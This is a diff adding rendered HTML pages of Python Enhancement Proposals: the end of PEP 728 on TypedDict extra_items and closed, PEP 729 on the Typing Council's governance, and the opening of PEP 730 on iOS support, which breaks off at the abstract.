
+
class Movie(TypedDict, extra_items=int):
+    name: str
+
+def f(**kwargs: Unpack[Movie]) -> None: ...
+
+# Should be equivalent to:
+def f(*, name: str, **kwargs: int) -> None: ...
+
+
+
+
+

Interaction with Read-only Items

+

When the extra_items argument is annotated with the ReadOnly[] +type qualifier, the extra items on the TypedDict have the +properties of read-only items. This interacts with inheritance rules specified +in Read-only Items.

+

Notably, if the TypedDict type specifies extra_items to be read-only, +subclasses of the TypedDict type may redeclare extra_items.

+

Because a non-closed TypedDict type implicitly allows non-required extra items +of value type ReadOnly[object], its subclass can override the +extra_items argument with more specific types.

+
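+
+For example, a sketch of narrowing the implicit read-only extra items (class names illustrative):
+
+class Loose(TypedDict):  # implicitly extra_items=ReadOnly[object]
+    name: str
+
+class Stricter(Loose, extra_items=int):  # OK. Overrides the read-only extra items with a narrower type
+    pass
+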

More details are discussed in the later sections.

+
+
+

Inheritance

+

extra_items is inherited in a similar way as a regular key: value_type +item. As with the other keys, the inheritance rules +and Read-only Items inheritance rules apply.

+

We need to reinterpret these rules to define how extra_items interacts with +them.

+
+
    +
  • Changing a field type of a parent TypedDict class in a subclass is not allowed.
  • +
+
+

First, it is not allowed to change the value of extra_items in a subclass +unless it is declared to be ReadOnly in the superclass:

+
class Parent(TypedDict, extra_items=int | None):
+    pass
+
+class Child(Parent, extra_items=int):  # Not OK. Like any other TypedDict item, extra_items's type cannot be changed
+    pass
+
+
+

Second, extra_items=T effectively defines the value type of any unnamed +items accepted by the TypedDict and marks them as non-required. Thus, the above +restriction applies to any additional items defined in a subclass. For each item +added in a subclass, all of the following conditions should apply:

+
    +
  • If extra_items is read-only
      +
    • The item can be either required or non-required
    • +
    • The item’s value type is assignable to T
    • +
    +
  • +
  • If extra_items is not read-only
      +
    • The item is non-required
    • +
    • The item’s value type is consistent with T
    • +
    +
  • +
  • If extra_items is not overridden, the subclass inherits it as-is.
  • +
+

For example:

+
class MovieBase(TypedDict, extra_items=int | None):
+    name: str
+
+class AdaptedMovie(MovieBase):  # Not OK. 'bool' is not assignable to 'int | None'
+    adapted_from_novel: bool
+
+class MovieRequiredYear(MovieBase):  # Not OK. Required key 'year' is not known to 'MovieBase'
+    year: int | None
+
+class MovieNotRequiredYear(MovieBase):  # Not OK. 'int | None' is not assignable to 'int'
+    year: NotRequired[int]
+
+class MovieWithYear(MovieBase):  # OK
+    year: NotRequired[int | None]
+
+class BookBase(TypedDict, extra_items=ReadOnly[int | str]):
+    title: str
+
+class Book(BookBase, extra_items=str):  # OK
+    year: int  # OK
+
+
+

An important side effect of the inheritance rules is that we can define a +TypedDict type that disallows additional items:

+
class MovieClosed(TypedDict, extra_items=Never):
+    name: str
+
+
+

Here, passing the value Never to extra_items specifies that +there can be no other keys in MovieClosed other than the known ones. +Because of its potential common use, there is a preferred alternative:

+
class MovieClosed(TypedDict, closed=True):
+    name: str
+
+
+

where we implicitly assume that extra_items=Never.

+
+
+

Assignability

+

Let S be the set of keys of the explicitly defined items on a TypedDict +type. If it specifies extra_items=T, the TypedDict type is considered to +have an infinite set of items that all satisfy the following conditions.

+
    +
  • If extra_items is read-only:
      +
    • The key’s value type is assignable to T.
    • +
    • The key is not in S.
    • +
    +
  • +
  • If extra_items is not read-only:
      +
    • The key is non-required.
    • +
    • The key’s value type is consistent with T.
    • +
    • The key is not in S.
    • +
    +
  • +
+

For type checking purposes, let extra_items be a non-required pseudo-item +when checking for assignability according to rules defined in the +Read-only Items section, with a new rule added in bold +text as follows:

+
+
A TypedDict type B is assignable to a TypedDict type +A if B is structurally assignable to +A. This is true if and only if all of the following are satisfied:
    +
  • [If no key with the same name can be found in B, the ‘extra_items’ +argument is considered the value type of the corresponding key.]
  • +
  • For each item in A, B has the corresponding key, unless the item in +A is read-only, not required, and of top value type +(ReadOnly[NotRequired[object]]).
  • +
  • For each item in A, if B has the corresponding key, the corresponding +value type in B is assignable to the value type in A.
  • +
  • For each non-read-only item in A, its value type is assignable to the +corresponding value type in B, and the corresponding key is not read-only +in B.
  • +
  • For each required key in A, the corresponding key is required in B.
  • +
  • For each non-required key in A, if the item is not read-only in A, +the corresponding key is not required in B.
  • +
+
+

The following examples illustrate these checks in action.

+

extra_items puts various restrictions on additional items for assignability +checks:

+
class Movie(TypedDict, extra_items=int | None):
+    name: str
+
+class MovieDetails(TypedDict, extra_items=int | None):
+    name: str
+    year: NotRequired[int]
+
+details: MovieDetails = {"name": "Kill Bill Vol. 1", "year": 2003}
+movie: Movie = details  # Not OK. While 'int' is assignable to 'int | None',
+                        # 'int | None' is not assignable to 'int'
+
+class MovieWithYear(TypedDict, extra_items=int | None):
+    name: str
+    year: int | None
+
+details: MovieWithYear = {"name": "Kill Bill Vol. 1", "year": 2003}
+movie: Movie = details  # Not OK. 'year' is not required in 'Movie',
+                        # so it shouldn't be required in 'MovieWithYear' either
+
+
+

Because 'year' is absent in Movie, extra_items is considered the +corresponding key. 'year' being required violates this rule:

+
+
    +
  • For each required key in A, the corresponding key is required in B.
  • +
+
+

When extra_items is specified to be read-only on a TypedDict type, it is +possible for an item to have a narrower type than the +extra_items argument:

+
class Movie(TypedDict, extra_items=ReadOnly[str | int]):
+    name: str
+
+class MovieDetails(TypedDict, extra_items=int):
+    name: str
+    year: NotRequired[int]
+
+details: MovieDetails = {"name": "Kill Bill Vol. 2", "year": 2004}
+movie: Movie = details  # OK. 'int' is assignable to 'str | int'.
+
+
+

This behaves the same way as if year: ReadOnly[str | int] were an item +explicitly defined in Movie.

+

extra_items as a pseudo-item follows the same rules that other items have, +so when both TypedDict types specify extra_items, this check is naturally +enforced:

+
class MovieExtraInt(TypedDict, extra_items=int):
+    name: str
+
+class MovieExtraStr(TypedDict, extra_items=str):
+    name: str
+
+extra_int: MovieExtraInt = {"name": "No Country for Old Men", "year": 2007}
+extra_str: MovieExtraStr = {"name": "No Country for Old Men", "description": ""}
+extra_int = extra_str  # Not OK. 'str' is not assignable to extra items type 'int'
+extra_str = extra_int  # Not OK. 'int' is not assignable to extra items type 'str'
+
+
+

A non-closed TypedDict type implicitly allows non-required extra keys of value +type ReadOnly[object]. Applying the assignability rules between this type +and a TypedDict type that specifies extra_items is allowed:

+
class MovieNotClosed(TypedDict):
+    name: str
+
+extra_int: MovieExtraInt = {"name": "No Country for Old Men", "year": 2007}
+not_closed: MovieNotClosed = {"name": "No Country for Old Men"}
+extra_int = not_closed  # Not OK.
+                        # 'extra_items=ReadOnly[object]' implicitly on 'MovieNotClosed'
+                        # is not assignable to 'extra_items=int'
+not_closed = extra_int  # OK
+
+
+
+
+

Interaction with Constructors

+

TypedDicts that allow extra items of type T also allow arbitrary keyword +arguments of this type when constructed by calling the class object:

+
class NonClosedMovie(TypedDict):
+    name: str
+
+NonClosedMovie(name="No Country for Old Men")  # OK
+NonClosedMovie(name="No Country for Old Men", year=2007)  # Not OK. Unrecognized item
+
+class ExtraMovie(TypedDict, extra_items=int):
+    name: str
+
+ExtraMovie(name="No Country for Old Men")  # OK
+ExtraMovie(name="No Country for Old Men", year=2007)  # OK
+ExtraMovie(
+    name="No Country for Old Men",
+    language="English",
+)  # Not OK. Wrong type for extra item 'language'
+
+# This implies 'extra_items=Never',
+# so extra keyword arguments would produce an error
+class ClosedMovie(TypedDict, closed=True):
+    name: str
+
+ClosedMovie(name="No Country for Old Men")  # OK
+ClosedMovie(
+    name="No Country for Old Men",
+    year=2007,
+)  # Not OK. Extra items not allowed
+
+
+
+
+

Interaction with Mapping[KT, VT]

+

A TypedDict type can be assignable to Mapping[KT, VT] types other than +Mapping[str, object] as long as all the value types of the items on the +TypedDict type are assignable to VT. This is an extension of the following +assignability rule from the typing spec:

+
+
    +
  • A TypedDict with all int values is not assignable to +Mapping[str, int], since there may be additional non-int values +not visible through the type, due to structural +assignability. These can be accessed using the values() and +items() methods in Mapping.
  • +
+
+

For example:

+
class MovieExtraStr(TypedDict, extra_items=str):
+    name: str
+
+extra_str: MovieExtraStr = {"name": "Blade Runner", "summary": ""}
+str_mapping: Mapping[str, str] = extra_str  # OK
+
+int_mapping: Mapping[str, int] = extra_int  # Not OK. 'int | str' is not assignable to 'int'
+int_str_mapping: Mapping[str, int | str] = extra_int  # OK
+
+
+

Type checkers should be able to infer the precise return types of values() +and items() on such TypedDict types:

+
def fun(movie: MovieExtraStr) -> None:
+    reveal_type(movie.items())  # Revealed type is 'dict_items[str, str]'
+    reveal_type(movie.values())  # Revealed type is 'dict_values[str, str]'
+
+
+
+
+

Interaction with dict[KT, VT]

+

Note that because the presence of extra_items on a closed TypedDict type +prohibits additional required keys in its structural +subtypes, we can determine if the TypedDict type and +its structural subtypes will ever have any required key during static analysis.

+

The TypedDict type is assignable to dict[str, VT] if all +items on the TypedDict type satisfy the following conditions:

+
    +
  • The value type of the item is consistent with VT.
  • +
  • The item is not read-only.
  • +
  • The item is not required.
  • +
+

For example:

+
class IntDict(TypedDict, extra_items=int):
+    pass
+
+class IntDictWithNum(IntDict):
+    num: NotRequired[int]
+
+def f(x: IntDict) -> None:
+    v: dict[str, int] = x  # OK
+    v.clear()  # OK
+
+not_required_num_dict: IntDictWithNum = {"num": 1, "bar": 2}
+regular_dict: dict[str, int] = not_required_num_dict  # OK
+f(not_required_num_dict)  # OK
+
+
+

In this case, methods that were previously unavailable on a TypedDict are allowed:

+
not_required_num_dict.clear()  # OK
+
+reveal_type(not_required_num_dict.popitem())  # OK. Revealed type is tuple[str, int]
+
+
+

However, dict[str, VT] is not necessarily assignable to a TypedDict type, +because such a dict can be an instance of a subclass of dict:

+
class CustomDict(dict[str, int]):
+    pass
+
+not_a_regular_dict: CustomDict = {"num": 1}
+int_dict: IntDict = not_a_regular_dict  # Not OK
+
+
+
+
+
+

How to Teach This

+

The choice of the spelling "extra_items" is intended to make this +feature more understandable to new users compared to shorter alternatives like +"extra".

+

Details of this should be documented in both the typing spec and the +typing documentation.

+
+
+

Backwards Compatibility

+

Because extra_items is an opt-in feature, no existing codebase will break +due to this change.

+

Note that closed and extra_items as keyword arguments do not collide +with other keys when using something like +TD = TypedDict("TD", foo=str, bar=int), because this syntax has already +been removed in Python 3.13.

+

Because this is a type-checking feature, it can be made available to older +versions as long as the type checker supports it.

+
+
+

Open Issues

+
+

Use a Special __extra_items__ Key with the closed Class Parameter

+

In an earlier revision of this proposal, we discussed an approach that would +utilize __extra_items__’s value type to specify the type of extra items +accepted, like so:

+
class IntDict(TypedDict, closed=True):
+    __extra_items__: int
+
+
+

where closed=True is required for __extra_items__ to be treated +specially, to avoid key collision.

+

Some members of the community have raised concerns about the elegance of the syntax. +Practically, the collision with a regular key can be mitigated with +workarounds, but since using a reserved key is central to that idea, +there are limited ways forward to address the concerns.

+
+
+

Support a New Syntax of Specifying Keys

+

By introducing a new syntax that allows specifying string keys, we could +deprecate the functional syntax of defining TypedDict types and address the +key conflict issues if we decide to reserve a special key to type extra items.

+

For example:

+
class Foo(TypedDict):
+    name: str  # Regular item
+    _: bool    # Type of extra items
+    __items__ = {
+        "_": int,   # Literal "_" as a key
+        "class": str,  # Keyword as a key
+        "tricky.name?": float,  # Arbitrary str key
+    }
+
+
+

This was proposed here by Jukka. +The '_' key was chosen because it avoids inventing a new name and is similar +to its use in the match statement.

+

This will allow us to deprecate the functional syntax of defining TypedDict +types altogether, but there are some disadvantages. For example:

+
    +
  • It’s less apparent to a reader that _: bool makes the TypedDict +special, relative to adding a class argument like extra_items=bool.
  • +
  • It’s backwards incompatible with existing TypedDicts using the +_: bool key. While such users have a way to get around the issue, +it’s still a problem for them if they upgrade Python (or +typing-extensions).
  • +
  • The types don’t appear in an annotation context, so their evaluation will +not be deferred.
  • +
+
+
+
+

Rejected Ideas

+
+

Allowing Extra Items without Specifying the Type

+

extra=True was originally proposed for defining a TypedDict that accepts +extra items regardless of the type, like how total=True works:

+
class ExtraDict(TypedDict, extra=True):
+    pass
+
+
+

Because it did not offer a way to specify the type of the extra items, type +checkers would need to assume that the type of the extra items is Any, which +compromises type safety. Furthermore, the current behavior of TypedDict already +allows untyped extra items to be present at runtime, due to +structural assignability. +closed=True plays a similar role in the current proposal.

+
+
+

Support Extra Items with Intersection

+

Supporting intersections in Python’s type system requires a lot of careful +consideration, and it can take a long time for the community to reach a +consensus on a reasonable design.

+

Ideally, extra items in TypedDict should not be blocked by work on +intersections, nor do they necessarily need to be supported through +intersections.

+

Moreover, the intersection between Mapping[...] and TypedDict is not +equivalent to a TypedDict type with the proposed extra_items special +item, as the value type of all known items in TypedDict needs to satisfy the +is-subtype-of relation with the value type of Mapping[...].

+
+
+

Requiring Type Compatibility of the Known Items with extra_items

+

extra_items restricts the value type for keys that are unknown to the +TypedDict type. So the value type of any known item is not necessarily +assignable to extra_items, and extra_items is +not necessarily assignable to the value types of all known items.

+

This differs from TypeScript’s Index Signatures +syntax, which requires all properties’ types to match the string index’s type. +For example:

+
interface MovieWithExtraNumber {
+    name: string // Property 'name' of type 'string' is not assignable to 'string' index type 'number'.
+    [index: string]: number
+}
+
+interface MovieWithExtraNumberOrString {
+    name: string // OK
+    [index: string]: number | string
+}
+
+
+

This is a known limitation discussed in TypeScript’s issue tracker, +where it is suggested that there should be a way to exclude the defined keys +from the index signature so that it is possible to define a type like +MovieWithExtraNumber.

+
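+
+Under this proposal, the equivalent Python definition is accepted, since the known items need not match extra_items:
+
+class MovieWithExtraNumber(TypedDict, extra_items=int):
+    name: str  # OK. 'str' does not need to be assignable to 'int'
+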
+
+
+

Reference Implementation

+

An earlier revision of this proposal is supported in pyright 1.1.352 and pyanalyze +0.12.0.

+
+
+

Acknowledgments

+

Thanks to Jelle Zijlstra for sponsoring this PEP and providing review feedback, +Eric Traut who proposed the original design +this PEP iterates on, and Alice Purcell for offering their perspective as the +author of PEP 705.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0728.rst

+

Last modified: 2024-10-19 02:14:30 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0729/index.html b/pep-0729/index.html new file mode 100644 index 00000000000..d0bf5136fa7 --- /dev/null +++ b/pep-0729/index.html @@ -0,0 +1,592 @@ + PEP 729 – Typing governance process | peps.python.org +
+
+


+ + +
+
+
+

PEP 729 – Typing governance process

+
+
Author:
+
Jelle Zijlstra <jelle.zijlstra at gmail.com>, Shantanu Jain <hauntsaninja at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Active
+
Type:
+
Process
+
Topic:
+
Governance, Typing
+
Created:
+
19-Sep-2023
+
Post-History:
+
04-Oct-2023, +20-Sep-2023
+
Resolution:
+
20-Nov-2023
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a new way to govern the Python type system: a council that is responsible +for maintaining and developing the Python type system. The council will maintain a +specification and conformance test suite and will initially be appointed by the Python Steering Council.

+
+
+

Motivation

+

The Python type system was created by PEP 484, almost ten years ago. The type +system is now widely used, and typing has become an important tool for writing +good, maintainable Python code. Many changes have been made to the type system to cover +more use cases and improve usability. Several type checkers have been created, each +with their own strengths. The type annotation syntax has driven several major innovations +in the Python ecosystem, such as the popular dataclasses module, runtime type +checking and validation by packages such as Pydantic, +and static compilation by tools such as mypyc.

+

However, as the type system has grown, several interrelated problems with the current +way to manage the type system have become apparent.

+
+

PEPs are the only specification

+

The Python type system was initially created by a PEP (PEP 484), and +changes to the type system are still made by PEPs. The specification for +the Python type system, to the extent there is one, consists of this series +of PEPs. But Standards Track PEPs aren’t meant to be living documents +or specifications; they are change proposals.

+

An example may illustrate the problem here. Around the same time +as the introduction of the typing module by PEP 484, PEP 3156 +introduced the asyncio module, another major new feature that has +been instrumental to the success of Python 3. Both modules +have evolved greatly since their initial creation and inspired changes to the +core language.

+

However, asyncio and typing are different in an essential aspect: +a user who uses asyncio interacts only with the standard library itself, +while a user of typing has to also think about an external tool, the type +checker. The Python language reference covers the symbols in the typing module, but does +not (and should not) go into detail on how the full type system should be +interpreted by type checkers. That material currently exists only in the PEPs.

+

This problem is shared by the packaging ecosystem, which attempts to solve it +by maintaining a separate set of PyPA specifications.

+
+
+

It’s hard to evolve the specification

+

Because the PEPs are the only specification we have, anything that could be seen +as a change to the specification would theoretically require a new PEP. But that +is often too heavy a process for a small change. Sometimes changes are made +directly to old PEPs instead, but that goes against the idea that accepted and +implemented PEPs become historical documents that should no longer be changed.

+

Some concrete examples include:

+
    +
  • PEP 484 explicitly says that typing.NoReturn cannot be used in +argument annotations. Nevertheless, type checkers have long accepted such +usage.
  • +
  • A 2023 discussion +noted that PEP 561’s description of partial stubs is unclear, and +major type checkers did not implement it exactly as specified.
  • +
  • The widely used third-party typing_extensions package provides backports of new +type system features. Type checkers are expected to treat symbols in this +module the same as symbols in typing, but this is not explicitly +specified in any of the PEPs.
  • +
+
+
+

The type system is underspecified

+

While the PEPs provide a specification, they are often not sufficiently precise +(sometimes intentionally so). This is especially true as the combinatorial +complexity of the type system has grown.

+

It ends up falling to individual type checkers to decide how to navigate +underspecified areas. In cases where type checkers informally coordinate, this +results in de facto standards that aren’t clearly recorded anywhere, making +the type system less accessible to newcomers. For example:

+ +
+
+

The Steering Council is not well-placed to solve the above problems

+

The SC has the entire language in its remit, and is not well-placed to make +decisions that are purely about the type system – if only because they don’t have +the time to deal with type system arcana alongside their other responsibilities. +This is similar in spirit to the reasons why the Steering Council sometimes uses +PEP delegation.

+
+
+

Endorsements

+

This PEP was endorsed by maintainers of all major +type checkers, including Rebecca Chen (pytype), +Eric Traut (Pyright), +and privately by maintainers of mypy and Pyre.

+
+
+
+

Specification

+

We propose the creation of a new group, the Typing Council. This group will +be responsible for developing and maintaining the Python type system, and +for solving the above problems.

+

The “operations and process” section describes how this group would operate and +be governed.

+

The more exciting “projects” section describes solutions to the above problems +that the Typing Council could shepherd.

+
+

Mandate

+

The Typing Council’s mandate is to ensure that the Python type system is:

+
    +
  • Useful: The type system should serve common use cases. As identified +by PEP 484, the primary use case is static analysis, but there are others, +such as runtime type checking, static compilation, IDE support, and documentation. +The Typing Council should consider all of these use cases when making decisions, +and be open to supporting additional use cases as they come up.
  • +
  • Usable: The type system should be easy to use for Python developers. It +should be ergonomic to write well-typed Python code that is accepted by type +checkers. There should be good documentation for the type system.
  • +
  • Stable: As the type system matures, users should be able to rely on their +typed code continuing to work and be able to trust their mental model for the +type system. Changes should be made with care and in a way +that minimizes disruption. Nevertheless, the type system should be able to +evolve, and it does not make sense to use the same compatibility guidelines +for type checker behavior as for Python itself. Of course, the existence +and runtime behavior of objects in the typing module does follow +Python’s standard compatibility policy in PEP 387.
  • +
+
+
+

Operations and process

+

The council would have three to five members, composed of prominent community members such as Python core developers and maintainers of major type checkers. The members should include people affiliated with a variety of projects related to type checking, such as type checkers, CPython, typeshed, or other related projects.

+

The initial members of the council are:

+
    +
  • Eric Traut (Pyright; author of PEP 647, PEP 681, and PEP 695)
  • +
  • Guido van Rossum (core developer; author of PEP 484 and PEP 526)
  • +
  • Jelle Zijlstra (core developer; typeshed; pyanalyze; author of PEP 688 and PEP 702)
  • +
  • Rebecca Chen (pytype)
  • +
  • Shantanu Jain (core developer; typeshed; mypy)
  • +
+

Current membership of the council is recorded in the +python/typing-council repository.

+

There is no term +limit for council members. Council members may resign their position at any time. +There is an expectation that each member serves at most five consecutive years +before resigning.

+

If there is a vacancy and there are three or more remaining members, it is up +to the Council to decide whether to appoint a new member. +To determine replacements, nominations will be collected from the typing +community. Self-nominations are allowed. The existing Typing Council will then decide +the replacement member(s) from the nominees. The expectation is that this would +be done by fiat, but the Typing Council can choose a replacement by any means +they see fit, including a vote.

+

The Typing Council remains accountable to the Steering Council. At any point, +for any reason, the Steering Council could (publicly or privately) make a +specific change or request a non-specific change to the composition of the +Typing Council.

+

We acknowledge that this is not a particularly democratic structure and puts a lot of faith in the Typing Council. However, the Python community has a long history of success with structures that are not particularly democratic! We believe self-governance, cycling of membership, and accountability to the Steering Council will be sufficient to ensure that the Typing Council is meeting the needs of the community.

+

The council would operate primarily through reviews of GitHub PRs. Regular +meetings are likely not necessary, but the council may set up video calls, a +private chat, or whatever other mechanism they decide upon internally.

+

The council should aim for transparency, posting all decisions publicly on +discuss.python.org, with a +rationale if possible. Before making a decision, the council should give +all interested community members a chance to weigh in. There should be at +least a week between the start of a discussion and the council’s decision.

+

Members of the council will be eligible to sponsor PEPs. If this PEP is accepted, +PEP 1 should be amended to note this fact.

+
+

Relationship with the Steering Council

+

Just like today, the Python Steering Council would remain responsible for the +overall direction of the Python language and would continue to decide on +typing-related PEPs. The Typing Council would provide written opinions and +recommendations to the Steering Council on typing-related PEPs.

+

However, smaller changes to the type system could be made +by the Typing Council directly. The Steering Council could also choose +to delegate decisions on some PEPs to the Typing Council (exactly as any other +PEP delegation).

+

Some examples of how past and recent issues could have been handled under this model:

+
    +
  • A PEP like PEP 695 (type parameter syntax), which changes the language syntax, would need to be decided upon by the Steering Council; the Typing Council would merely provide an opinion or endorsement. Similarly, PEPs like PEP 702 (deprecations) would be decided upon by the Steering Council, because they concern runtime behavior beyond pure typing. Other examples that would need to be decided by the SC include PEP 718 (subscriptable functions) and PEP 727 (documentation metadata).
  • +
  • A PEP like PEP 698 (@override), which affects only users of type +checkers and does not change the overall language, would also by default +be decided upon by the Steering Council. However, such PEPs could be +delegated to the Typing Council for a decision (like any other PEP delegation). +Other examples of PEPs that could potentially be delegated include +PEP 647 (type guards), PEP 655 (individual required TypedDict items), +PEP 673 (Self), and PEP 675 (Literal).
  • +
  • Adding a smaller feature, such as typing.Never as an alias for +typing.NoReturn, would be done by means of a PR to the spec and +conformance test suite. The Typing +Council would then decide whether or not to merge the PR. They may ask for the +feature to be specified and discussed in a PEP if they feel that is warranted.
  • +
  • If there is confusion about the interpretation of some part of the spec, as happened recently with partial stubs in PEP 561, somebody would make a PR to the typing specification to clarify the spec, and then the Typing Council would decide on the spec change.
  • +
+

The runtime typing module will continue to be maintained by the CPython core developer team. However, any changes to the runtime module that affect type checker behavior should be made in conjunction with a change to the specification (see below) and should be approved by the Typing Council. For example, in Python 3.11 the core developers added the new function typing.assert_type(). If the Typing Council had been in place, this change would have required a matching change to the specification and approval by the Typing Council. On the other hand, Python 3.11 also added the typing.get_overloads() introspection helper. As this function does not affect type checker behavior, it would not require approval by the Typing Council. However, as support for runtime type checkers is within the remit of the Council, they should monitor such changes and provide feedback when appropriate.
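To make the distinction concrete, here is a small sketch using the two Python 3.11 additions just mentioned; the comments note which side of the line each function falls on, and the printed output is illustrative.

```python
from typing import assert_type, get_overloads, overload

# assert_type() affects type checker behavior: a checker verifies that the
# inferred type of the first argument matches the given type. At runtime the
# value is simply returned unchanged.
x = 1 + 1
assert_type(x, int)

@overload
def f(x: int) -> int: ...
@overload
def f(x: str) -> str: ...
def f(x):
    return x

# get_overloads() is purely a runtime introspection helper: type checkers do
# not change their behavior because of it, so it needed no spec change.
print(get_overloads(f))  # the two @overload-decorated stubs, in order
```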

+
+
+

Relationship with type checkers

+

The Typing Council has no direct authority over type checkers; it cannot +force them to implement particular features or make behavior changes. Type +checkers are incentivized to follow the specification set out by the Council +because it allows them to take advantage of shared resources, such as +libraries that expose typing information that follows the specification, +the stub files in typeshed, the typing standard library module, and +user documentation that covers the standard type system. +Type checkers are free to extend the type system or deviate from the +specification, but they should document such differences clearly.

+

The fact that type checkers need to implement any decisions made by the +Typing Council acts as a useful brake on the Council, ensuring that its +decisions are conservative and well-considered. Individual type checkers +remain free to innovate as they see fit, and successful innovations can +be incorporated into the standard type system.

+
+
+
+

Projects

+

Here are some efforts a Typing Council would be responsible for.

+
+

Conformance test suite

+

A conformance test suite would provide machine-checkable documentation of how type checkers should check Python code, accompanied by the results of major type checker implementations on the test suite. A rough sketch of what this could look like was created by Shantanu.

+

The suite would contain prescriptive tests for behavior prescribed by previous PEPs, and descriptive tests that document the behavior of existing implementations in areas not prescribed by any standard. The descriptive tests would be useful for informing the efforts below and for identifying areas of focus for standardization.
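As a purely illustrative sketch (the suite’s actual layout and conventions are not defined by this PEP), a test module might separate the two kinds of tests like this:

```python
from typing import assert_type

def test_prescriptive() -> None:
    # Prescriptive: PEP 484 requires ``int`` to be inferred here, so every
    # conforming type checker must accept this assertion.
    x = 1 + 1
    assert_type(x, int)

def test_descriptive() -> None:
    # Descriptive: no standard prescribes the type inferred for a mixed
    # conditional expression; the suite would record what each checker
    # currently infers rather than mandate a single answer.
    y = [1] if bool() else (1,)
```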

+
+
+

Specification for the type system

+

A specification would initially be created by stitching together the +specification sections from the existing PEPs, and then gradually improved to +clarify points of confusion and cover more areas. A draft of such a +stitched-together spec was created by Jelle.

+

The specification has a few audiences:

+
    +
  • For type checkers, it provides a description of how an idealized type checker +should behave. Individual type checkers have different goals and technical +constraints and they are free to deviate from the spec if they do not have the +resources to fully implement it or if they believe a different behavior better +serves their users. However, they should document such deviations from the +spec.
  • +
  • For projects such as typeshed, or libraries that want to be compatible with +multiple type checkers, it provides a set of rules that they can follow to +make their code understood by type checkers.
  • +
  • For people who want to propose changes to the type system, it provides a +foundation for any new proposals.
  • +
+

Notably, the specification is not aimed at application developers who use +typing. Such users typically do not +need to worry about compatibility across type checkers. They +are better served by a more informal user-facing reference, which is discussed +in the next section.

+

There are different opinions within the community about how formal such a specification should be. While this document recommends an incremental approach that builds on the existing specifications, it does not aim to prescribe a final state. The Typing Council would provide a mechanism to allow the specification to evolve to meet the level of formality that the community desires, for instance, by incorporating parts of Kevin Millikin’s document on “Python Static Types” as a means to achieve a better formalization of the spec.

+

Proposed changes to the specification, including PEPs, should +generally be accompanied by the following:

+
    +
  • Buy-in from type checker maintainers to confirm that the +change can be implemented and maintained within their type +checkers.
  • +
  • For changes to existing features, a survey of the behavior +of existing type checkers. If existing type checkers +behave roughly similarly, that is evidence that their shared +behavior should be made part of the specification.
  • +
  • Changes to the conformance test suite that demonstrate the +specified behavior.
  • +
+
+
+

User-facing reference for the type system

+

Documentation is important for the success of the Python type system, so +the Typing Council should ensure that there is good documentation for the +type system.

+

As mentioned previously, PEPs are point-in-time change proposals aimed at multiple audiences, and they are hard to amend or clarify after acceptance. This makes them ill-suited as user documentation. The specification discussed in the previous section would be a living document, but it would likely be too technical to serve as documentation for normal usage.

+

Therefore, a separate user-facing reference for the type system would be +useful. Such an effort could expand the documentation on +typing.readthedocs.io and +reuse material from the documentation sections of individual type checkers +and the CPython documentation.

+
+
+
+

Amendments

+

This PEP serves as a charter for the Typing Council. Changes to its operation +can be made either through a new PEP or through a change to this PEP. In either +case, the change would be decided upon by the Steering Council after discussion +in the community.

+
+
+
+

Rejected ideas

+
+

Writing the specification from scratch

+

This PEP proposes creating the typing specification by starting from the +existing PEPs, then clarifying and improving the specification as necessary. +Some members of the community prefer to start from scratch, writing a new, +more formal specification covering the entire type system. This could +provide a more solid basis for the specification.

+

However, this would be a much larger undertaking. The existing formalization +effort by Kevin Millikin is a good start, but so far covers only a subset of +PEP 484. Covering the rest of the type system would likely require several +times more effort when we consider that major type system features such +as typing.Protocol, typing.Literal, and typing.TypedDict +were introduced only after PEP 484. It is not clear that there is even energy +in the community for such a huge undertaking. Even if someone steps up to +do all the work of putting together a specification, lots of effort would be +required from community members and type checker maintainers to consider +whether the specification accurately reflects current behavior, and if not, +whether the specification or the type checkers should change.

+

Starting with the existing PEPs creates a lower-quality specification, +but it means that the Typing Council can immediately start making a difference +anywhere in the type system by improving and clarifying the specification. +A formalization effort can still proceed by gradually replacing sections of the +specification.

+
+
+

Alternate governance mechanisms

+

An earlier draft of this PEP suggested that the Steering Council appoint +members of the Typing Council each year. The current Steering Council suggested +that it would be better to have the Typing Council self-organise and avoid +the need for the Steering Council to continuously supervise the Typing Council.

+

Alternate governance mechanisms are possible, including more democratic ones, +but these typically raise several thorny questions, require much heavier +amounts of process and are potentially more divisive. For example, see the PEP +8000 series, or recent discussions about alternative governance in other Python +subcommunities. Ultimately, the Typing Council exists under the authority of the +Steering Council, and so can rely on it to bootstrap governance and serve as an +accountability mechanism.

+
+
+

Do nothing

+

We are hopeful that substantial progress will be made on projects that improve the type system regardless of whether this PEP is accepted. We anticipate that projects like the specification, or the potential for PEP delegation, would benefit more from a Typing Council, and that projects like end-user documentation would benefit less. Certainly the bottleneck is likely to be contributor effort, not governance.

+

However, currently the tools available to the community to resolve potential +contention are either establishment of approximate consensus or the exercise of +power by individual projects or contributors. While very valuable, the former is +a slow process that can often end in inaction. The latter can result in a less +consistent ecosystem. Finally, easily legible governance structures make the +community more accessible and equitable.

+
+
+
+

Contact

+

To ask the Typing Council for a decision, +community members may open an issue in the +python/typing-council +repository.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0729.rst

+

Last modified: 2024-10-17 12:49:39 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0730/index.html b/pep-0730/index.html new file mode 100644 index 00000000000..5ba82194529 --- /dev/null +++ b/pep-0730/index.html @@ -0,0 +1,706 @@ + + + + + + + + PEP 730 – Adding iOS as a supported platform | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 730 – Adding iOS as a supported platform

+
+
Author:
+
Russell Keith-Magee <russell at keith-magee.com>
+
Sponsor:
+
Ned Deily <nad at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
09-Oct-2023
+
Python-Version:
+
3.13
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at Using Python on iOS.

+


+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

